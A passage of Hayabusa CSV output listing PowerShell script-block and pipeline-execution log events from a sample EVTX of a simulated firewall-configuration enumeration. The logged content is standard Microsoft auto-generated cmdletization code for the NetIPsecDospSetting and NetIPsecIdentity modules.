${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('StateIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${StateIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'StateIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerIPRateLimitQueueIdleTimeoutSeconds')) { [object]$__cmdletization_value = ${PerIPRateLimitQueueIdleTimeoutSeconds} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PerIPRateLimitQueueIdleTimeoutSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthDscp} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecUnauthPerIPRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecUnauthPerIPRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecUnauthPerIPRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthDscp')) { [object]$__cmdletization_value = ${IpV6IPsecAuthDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6IPsecAuthRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6IPsecAuthRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6IPsecAuthRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 
'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo 
@('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetIPsecIdentity ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall 
configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 